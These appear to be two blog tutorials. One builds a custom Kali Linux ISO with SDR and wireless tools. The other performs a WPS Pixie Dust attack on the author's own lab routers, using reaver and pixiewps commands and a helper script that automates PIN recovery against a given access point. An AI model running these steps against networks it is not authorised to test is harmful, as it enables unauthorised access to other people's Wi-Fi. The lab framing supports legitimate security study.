Kali 2 Sana Custom ISO Build – Software Defined Radio (SDR) & Wireless Tools

I have been meaning to do this for ages: nobody enjoys configuring a system from scratch every single time, and repeating the same steps again and again is the definition of insanity. So let's fix that by automating the Kali installation and trimming it along the way, so that only the tools you actually want or need get installed.

First things first, refresh the package lists with

apt-get update

[Image: 1_Kali_Sana_Prep_Work_update]

Install live-build

apt-get install git live-build

[Image: 2_Kali_Sana_Install_Live_Build]

Next create a working directory, change into it, clone the live-build-config repository, change into that and have a look at what's inside. Note that the git:// transport is unauthenticated; if the repository is also offered over https, use that URL instead, since you are about to build a bootable OS from whatever you pull down.

mkdir Kali_2.0_Custom_Build
cd Kali_2.0_Custom_Build
git clone git://git.kali.org/live-build-config.git
cd live-build-config
ls

[Image: 3_Kali_Sana_git_clone_live_build]

Now, with the editor of your choice, open the package list for the XFCE variant (it is a file, not a directory)

nano kali-config/variant-xfce/package-lists/kali.list.chroot

[Image: 4_Kali_Sana_Modify_Packages]

For the GUI I am going with kali-desktop-xfce because it is basic, light and fast. I don't want the full metapackage either: I mainly use the wireless tools and plan to use the Software Defined Radio (SDR) tools, so there is no need to install everything. Your needs may differ, so decide what you want before you continue.

All I am doing is removing the leading # from the kali-linux-sdr and kali-linux-wireless lines so that those two metapackages get installed, and leaving every other optional metapackage in the list commented out.

The kali.list.chroot file will look like this below

[Image: 5_Kali_Sana_Packages_Before_Modification]

After it should look like I have it below, so save the file and continue to the next step

[Image: 6_Kali_Sana_Packages_After_Modification]

Create a new file called 01-unattended-boot.binary in kali-config/common/hooks/

nano kali-config/common/hooks/01-unattended-boot.binary

Make it executable as well, otherwise live-build will not run the hook

chmod +x kali-config/common/hooks/01-unattended-boot.binary

[Image: 7_Kali_Sana_Unattended_File_Configuration]

Paste in the following:

#!/bin/sh

cat >>binary/isolinux/install.cfg <<END
label install
menu label ^Unattended Install
menu default
linux /install/vmlinuz
initrd /install/initrd.gz
append vga=788 -- quiet file=/cdrom/install/preseed.cfg locale=en_US keymap=us hostname=kali domain=local.lan
END

Save the file once again. This hook comes courtesy of the Kali Dojo.

[Image: 8_Kali_Sana_Unattended_File_Configuration_Created]

With that done, the next step is to get or write a preseed file so that every installer question is answered for you automatically. I am going to use the one from the Kali Dojo, which the Offensive Security team use when building their images (the URL is in the wget command below). Read through it before you use it: among other things it sets the root password, which is why the finished system logs in as root/toor at the end of this post, so either change that entry or change the password on first boot.

Pull down the file and save it in the correct directory like this
wget https://www.kali.org/dojo/preseed.cfg -O ./kali-config/common/includes.installer/preseed.cfg

[Image: 9_Kali_Sana_Unattended_Preseed_wget]

We are nearly there, but the desktop is going to be bare, so find a high quality image of your choosing and adapt the commands below to replace the background image with your own. Being indecisive, I am going to use the Kali Dojo wallpaper (URL in the wget command below).

Make a new directory
mkdir -p kali-config/common/includes.chroot/usr/share/images/desktop-base/

Download and save the image into the newly created directory
wget https://www.kali.org/dojo/wp-blue.png -O kali-config/common/includes.chroot/usr/share/images/desktop-base/kali-wallpaper_1920x1080.png

[Image: 10_Kali_Sana_Unattended_Desktop_Background]

Start off your new build

./build.sh --variant xfce --distribution sana --verbose

"build.sh" is the script that builds the ISO from your configuration options
"--variant xfce" selects the XFCE desktop variant (the kali-config/variant-xfce directory whose package list you edited above)
"--distribution sana" selects the correct distribution for Kali Sana 2.0
"--verbose" gives you plenty of output to stare at while it runs, and it may run for a while; don't worry about reading everything, as it is all written to a log file you can review when the build has finished.
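The whole procedure above, collected into one shell script. This is an added example, not part of the original post or of Kali's live-build-config. It assumes the repository layout the post uses (kali-config/variant-xfce/package-lists/kali.list.chroot, kali-config/common/hooks/, kali-config/common/includes.installer/) and GNU sed, and it adds two checks the post does only by eye: each metapackage is confirmed to be uncommented after editing, and the downloaded preseed is scanned for a cleartext root password before the build starts. The function and variable names are my own.

```shell
#!/bin/sh
# Added example (not from the original post): the ISO customisation steps
# as shell functions. Paths follow the post; the kali-config/ layout is assumed.
set -eu

# Uncomment the given metapackages in a live-build package list.
# Only a line that is exactly "# <name>" (optional spaces) is touched,
# so enabling "kali-linux-sdr" does not also enable a longer name with
# the same prefix. Fails if a package line is not present afterwards.
enable_metapackages() {
    list="$1"; shift
    for pkg in "$@"; do
        # metapackage names contain only [A-Za-z0-9.+-], safe inside a BRE
        sed -i "s/^#[[:space:]]*\(${pkg}\)[[:space:]]*\$/\1/" "$list"
        grep -qx "$pkg" "$list" || {
            echo "enable_metapackages: $pkg not found in $list" >&2
            return 1
        }
    done
}

# Write the isolinux hook that adds the "Unattended Install" menu entry
# (same content as the post's 01-unattended-boot.binary) and make it
# executable; live-build only runs hooks that carry the exec bit.
write_unattended_hook() {
    hook="$1/kali-config/common/hooks/01-unattended-boot.binary"
    mkdir -p "$(dirname "$hook")"
    cat > "$hook" <<'EOF'
#!/bin/sh

cat >>binary/isolinux/install.cfg <<END
label install
menu label ^Unattended Install
menu default
linux /install/vmlinuz
initrd /install/initrd.gz
append vga=788 -- quiet file=/cdrom/install/preseed.cfg locale=en_US keymap=us hostname=kali domain=local.lan
END
EOF
    chmod +x "$hook"
}

# The dojo preseed sets a fixed root password (the post logs in as
# root/toor). Print every cleartext "passwd/*-password password ..." line
# and return 1 if one exists, so it is changed before the ISO is shared.
# A crypted entry (passwd/root-password-crypted) is left alone.
audit_preseed() {
    if grep -E '^d-i[[:space:]]+passwd/.*-password[[:space:]]+password[[:space:]]' "$1"; then
        echo "audit_preseed: cleartext password in $1; use passwd/root-password-crypted or change it on first boot" >&2
        return 1
    fi
}

# The full build, in the order the post performs it.
build_custom_iso() {
    top="$1"
    mkdir -p "$top" && cd "$top"
    # git:// is an unauthenticated transport; prefer an https URL if one is offered
    [ -d live-build-config ] || git clone git://git.kali.org/live-build-config.git
    cd live-build-config
    enable_metapackages kali-config/variant-xfce/package-lists/kali.list.chroot \
        kali-linux-sdr kali-linux-wireless
    write_unattended_hook .
    mkdir -p kali-config/common/includes.installer
    wget https://www.kali.org/dojo/preseed.cfg -O kali-config/common/includes.installer/preseed.cfg
    audit_preseed kali-config/common/includes.installer/preseed.cfg || true   # warn, but keep going
    mkdir -p kali-config/common/includes.chroot/usr/share/images/desktop-base/
    wget https://www.kali.org/dojo/wp-blue.png \
        -O kali-config/common/includes.chroot/usr/share/images/desktop-base/kali-wallpaper_1920x1080.png
    ./build.sh --variant xfce --distribution sana --verbose
}

# Only build when invoked as "sh build-sdr-iso.sh run"; sourcing the file
# (or running it without "run") just defines the functions.
if [ "${1:-}" = "run" ]; then
    build_custom_iso "$HOME/Kali_2.0_Custom_Build"
fi
```

Run it with `sh build-sdr-iso.sh run` as root inside the Kali VM; `enable_metapackages` aborts the build if a metapackage name is misspelt, which the manual edit in nano would not catch until hours later.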

[Image: 11_Kali_Sana_Build_Unattended_ISO_Start]

Be patient at this point, as the build can take a long time. The last time I built a full ISO with everything in it, it took two hours in total. I expected a wireless and SDR only build to be quicker, but it actually took six hours for me, so the build time depends far more on your mirror and download speed than on how many tools you pick.

When finished it will look like the following below without any errors

[Image: 12_Kali_Sana_Build_Unattended_ISO_Finish]

The ISO will be saved in the images/ directory inside the repository you cloned, i.e. live-build-config/images/

[Image: 13_Kali_Sana_Build_Unattended_ISO_File_location]

At this point I like to copy the ISO out of my VM into my host OS. Depending on your setup this will be different.

[Image: 14_Kali_Sana_Build_Unattended_ISO_File_Copy_Host]

Configure VirtualBox to your liking; if you're unsure of the configuration settings please refer to this tutorial for guidance. When booting just select the "Unattended Install" entry that the hook added (it is also the default) and watch the configuration magic happen all on its own!

[Image: 15_Kali_Sana_Select_Install_to_automatically_install]

Log in with the credentials the preseed file set
username: root
password: toor
and change that password straight away: anyone who has read the same public preseed file knows it.

[Image: 16_Kali_Sana_XFCE_Custom_SDR_WIreless_tools_first_boot]

Select the default configuration when prompted

[Image: 17_Kali_Sana_XFCE_Custom_SDR_WIreless_tools_first_boot_select_default_config]

Now you have your own custom built XFCE ISO with only Software Defined Radio (SDR) and wireless related tools that will automatically install for you, cool isn’t it? You can also use it as a live image too without installing it.

[Image: 18_Kali_Sana_XFCE_Custom_SDR_WIreless_tools_complete]

You can do all the normal things like install VirtualBox guest additions, for help on this refer to this tutorial

[Image: 19_Kali_Sana_XFCE_Custom_SDR_WIreless_tools_VirtualBox_Guest_additions_install]

Have fun building!


18 – WPS Offline Pixie Dust Attack

Hey everyone, it's been a while since my last blog entry. I recently started playing around with the WPS offline Pixie Dust attack, which I first mentioned back in May 2015, and wanted to document it. I have not yet had any success with it against my own routers, but they are still exploitable with the older online reaver method I wrote about here and here, and the Pixie Dust process itself is worth walking through. Please refer to my previous tutorial for some background on attacking WPS.
For this tutorial I am using Kali 2.0 "sana" in a VM, which ships with all the tools required to perform this attack, so grab the latest Kali ISO, update it fully and you will be good to follow along 🙂

I have two routers that are susceptible to the old online method using reaver, so I used them again for this tutorial. Unfortunately the offline attack doesn't work against them, but the process does, so it's worthy of a blog entry!

First, as always, get your card into monitor mode. Note that airmon-ng in Kali 2 "sana" behaves a little differently from what you may be used to:

“airmon-ng check kill” will kill anything that may be interfering with your card when in monitor mode
“airmon-ng start wlan0” as you probably know now will place your card into monitor mode

[Image: 1_Monitor_mode_Kali_Sana]

As you can see, instead of a new interface called "mon0" being created we get "wlan0mon". This is not a bug: the rewritten airmon-ng that ships with aircrack-ng 1.2 names the monitor interface after the physical one. It does exactly the same job; just remember to use the new name in every later command.

Checking with iwconfig will show you that monitor mode is actually enabled so you don’t need to make any further changes:

“iwconfig” used below to make sure that the card is in monitor mode

[Image: 2_iwconfig_monitor_mode_check]

BUT sometimes I have found that even though iwconfig says the card is in monitor mode, when you start airodump-ng sniffing the airwaves you see nothing at all. In that case take the interface down, set monitor mode on it manually and bring it back up:

“ifconfig wlan0mon down” this will put the interface down
“iwconfig wlan0mon mode monitor” this will manually set monitor mode on the wireless interface
“ifconfig wlan0mon up” this will put the interface up again

[Image: 3_Kali_sana_manual_monitor_mode_configuration]

After you do this if you run

“airodump-ng wlan0mon” to make sure you are sniffing the airwaves

You will see things are working as expected:

[Image: 4_airodump-ng_output_after_manual_configuration]

My lab routers for attacking are named “dlink” and “test” under the ESSID column above

Trying this attack against the access point labeled test first:

“reaver” runs reaver
“-i wlan0mon” specifies that you want to use the wlan0mon interface for this attack
“-b 2C:B0:5D:XX:XX:XX” is used to specify the MAC address of the access point you are targeting
“-vv” is used to display very verbose output
“-w” used to mimic a Windows 7 registrar
“-n” is used as this target access point always sends a NACK
“-S” is to only use small DH keys to improve the cracking speed
“-c 1” is used to specify the channel on which the access point resides

reaver -i wlan0mon -b 2C:B0:5D:XX:XX:XX -vv -w -n -S -c 1

[Image: 5_reaver_pixiedust_attack_kali_2_sana]

You may get different results with different access points, so look at the reaver and pixiewps man pages and try different switches. I already know this access point is not vulnerable, but to show what to do with the information, open pixiewps and feed it the values you just enumerated from the reaver output (PKE, E-Hash1, E-Hash2, AuthKey and E-Nonce) in order to recover the WPS PIN offline. Pass -S to pixiewps only because reaver was also run with -S; if it was not, supply the registrar public key with -r PKR instead:

“pixiewps” runs pixiewps
“-e” Enrollee public key
“-s” Enrollee hash1
“-z” Enrollee hash2
“-a” Authentication session key
“-n” Enrollee nonce (mode 2,3,4)
“-S” Small Diffie-Hellman keys (PKr not needed)

pixiewps -e PKE -s E-Hash1 -z E-Hash2 -a AuthKey -n E-Nonce -S

[Image: 6_pixiewps_kali_2_sana_pin]

As you can see no WPS pin is found but that just means my access point is not vulnerable to this offline attack method, it is however vulnerable to the online method as can be seen in previous tutorials here and here.
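The two manual steps above, putting the card into monitor mode when airmon-ng's result does not stick, and hand-copying reaver's enumerated values into pixiewps, as shell functions. This is an added example, not from the original post or from the reaver and pixiewps projects. It assumes the `[P] PKE:`, `[P] PKR:`, `[P] E-Hash1:`, `[P] E-Hash2:`, `[P] AuthKey:` and `[P] E-Nonce:` lines that the reaver-wps-fork-t6x build prints with -vv, that reaver's output has been saved to a file (here via tee), and that `iw` is installed alongside iwconfig; the function names and the sample log in the test are my own constructions.

```shell
#!/bin/sh
# Added example (not from the original post): helpers for the monitor-mode
# check and for feeding reaver's enumerated WPS values into pixiewps.
set -eu

# Put an interface into monitor mode the way the post does by hand, but only
# when "iw" does not already report it as monitor; fails if it still is not.
ensure_monitor_mode() {
    iface="$1"
    if ! iw dev "$iface" info 2>/dev/null | grep -q 'type monitor'; then
        ifconfig "$iface" down
        iwconfig "$iface" mode monitor
        ifconfig "$iface" up
    fi
    iw dev "$iface" info | grep -q 'type monitor'
}

# Print the value of one "[P] <Name>: <value>" line from a saved reaver -vv
# log (line format assumed from the reaver-wps-fork-t6x build); empty if absent.
pixie_field() {
    sed -n "s/^\[P\] $2: *//p" "$1" | head -n 1
}

# Build the pixiewps argument list from the log. PKR is passed with -r when
# reaver printed it; otherwise -S is used, which assumes reaver was run with
# -S (small DH key, so PKR is implied). Returns 1 if a required value is missing,
# i.e. the exchange never reached M3 and there is nothing to crack offline.
pixie_args() {
    log="$1"
    pke=$(pixie_field "$log" PKE)
    pkr=$(pixie_field "$log" PKR)
    h1=$(pixie_field "$log" E-Hash1)
    h2=$(pixie_field "$log" E-Hash2)
    authkey=$(pixie_field "$log" AuthKey)
    enonce=$(pixie_field "$log" E-Nonce)
    for v in "$pke" "$h1" "$h2" "$authkey" "$enonce"; do
        [ -n "$v" ] || { echo "pixie_args: incomplete WPS exchange in $log" >&2; return 1; }
    done
    if [ -n "$pkr" ]; then
        printf '%s\n' "-e $pke -r $pkr -s $h1 -z $h2 -a $authkey -n $enonce"
    else
        printf '%s\n' "-e $pke -s $h1 -z $h2 -a $authkey -n $enonce -S"
    fi
}

# Run one reaver exchange against a BSSID on a channel, keep the log, then
# hand the values to pixiewps. Usage: run_pixie wlan0mon 00:18:E7:XX:XX:XX 6
run_pixie() {
    iface="$1"; bssid="$2"; channel="$3"
    log="reaver-$(printf '%s' "$bssid" | tr -d ':').log"
    ensure_monitor_mode "$iface"
    # same switches as the post; -K 1 lets reaver call pixiewps itself, and the
    # saved log allows re-running pixiewps with other switches without re-associating
    reaver -i "$iface" -b "$bssid" -c "$channel" -vv -w -n -S -K 1 | tee "$log"
    args=$(pixie_args "$log") || return 1
    # word-splitting of $args into separate switches is intended
    pixiewps $args
}
```

Because the values are kept in a file, a failed first attempt costs nothing to retry: `pixiewps $(pixie_args reaver-0018E7XXXXXX.log) --force` tries the slower modes without touching the access point again, which matters when the AP locks WPS after a few failed PIN attempts.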

Now I also have another access point to check labeled “dlink” as you can see above so lets jump straight to it!

“reaver” to run reaver
“-i wlan0mon” will run on the interface of your wireless card
“-b 00:18:E7:XX:XX:XX” is to set the MAC address of the target access point
“-vv” runs in very verbose mode
“-w” is to mimic a Windows 7 registrar
“-n” as the target AP always sends a NACK
“-S” to use small DH keys to improve the crack speed
“-c 6” is to set the channel the access point is running on

reaver -i wlan0mon -b 00:18:E7:XX:XX:XX -vv -w -n -S -c 6

The PINs generated here are incorrect (neither matches the PIN on the router), but the default PIN generator is worth trying whenever the access point is a D-Link or Belkin. The devttys0 team reversed how both vendors derive the default WPS PIN from device identifiers such as the MAC address, so if your router is listed in their D-Link or Belkin write-ups you may get lucky.

[Image: 7_Kali_sana_2_pixiewps_d-link_default_pin_generation]

Another method: let reaver hand the values to pixiewps itself with -K

“reaver” to run reaver
“-i wlan0mon” will run on the interface of your wireless card
“-b 00:18:E7:XX:XX:XX” is to set the MAC address of the target access point
“-a” to auto detect the best advanced options for the target access point
“-vv” runs in very verbose mode
“-w” is to mimic a Windows 7 registrar
“-K 1” to Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom, Realtek). Increment the value after -K.
“-n” as the target AP always sends a NACK
“-S” to use small DH keys to improve the crack speed
“-c 6” is to set the channel the access point is running on

reaver -i wlan0mon -b 00:18:E7:XX:XX:XX -a -vv -w  -K 1 -n -S -c 6

[Image: 8_Kali_sana_2_pixie_dust_reaver_WPS_PIN_method]

Even though these methods aren't working for me, that doesn't mean they won't work for you, so try them against your own router and see whether it is vulnerable. When the offline attack does work, the time needed to recover the PIN (and with it the WPA passphrase) drops from hours to seconds, so it's definitely worth trying.

Before I end this tutorial though I just want to point you in the direction of some cool switches I discovered in the latest version of the aircrack-ng suite which you can use for WPS enumeration.

"airodump-ng" to start airodump-ng sniffing the airwaves
"-W" to display whether the access point supports WPS. The first field of the WPS column is the version supported; the second field is the WPS config method, of which there can be more than one, separated by commas:
USB = USB method
ETHER = Ethernet
LAB = Label
DISP = Display
EXTNFC = External NFC
INTNFC = Internal NFC
NFCINTF = NFC Interface
PBC = Push Button
KPAD = Keypad
"Locked" is displayed when the AP setup is locked.
"-M" to display the manufacturer from the IEEE OUI list
"wlan0mon" is the interface to sniff on; airodump-ng takes it as the final positional argument (its -i switch is --ivs, save only captured IVs, not an interface selector)

airodump-ng -W -M wlan0mon

[Image: 9_Kali_sana_airodump-ng_WPS_enumeration]

Wash also has a cool feature now too to enumerate some more information from your router

“wash” to run wash
“-i wlan0mon” to run the interface of your wireless card
“-g” to pipe output and run reaver alongside wash to get the chipset
“-c 1” specifies the channel you wish to run on

wash -i wlan0mon -g -c 1

[Image: 10_Kali_sana_wash_enumeration]

It’s handy for checking if the access point is locked out quickly before trying the reaver or Pixie Dust Attack.

That's it for now. Attacking WPS has come a long way in a short period of time, and it's only a matter of time before this becomes a simple procedure that works in seconds to minutes, once enough default PIN generation algorithms have been reversed and added, making WPS even easier to crack than WEP was. You remember how easy WEP was to crack, right? It's like travelling back in time to 2005 all over again.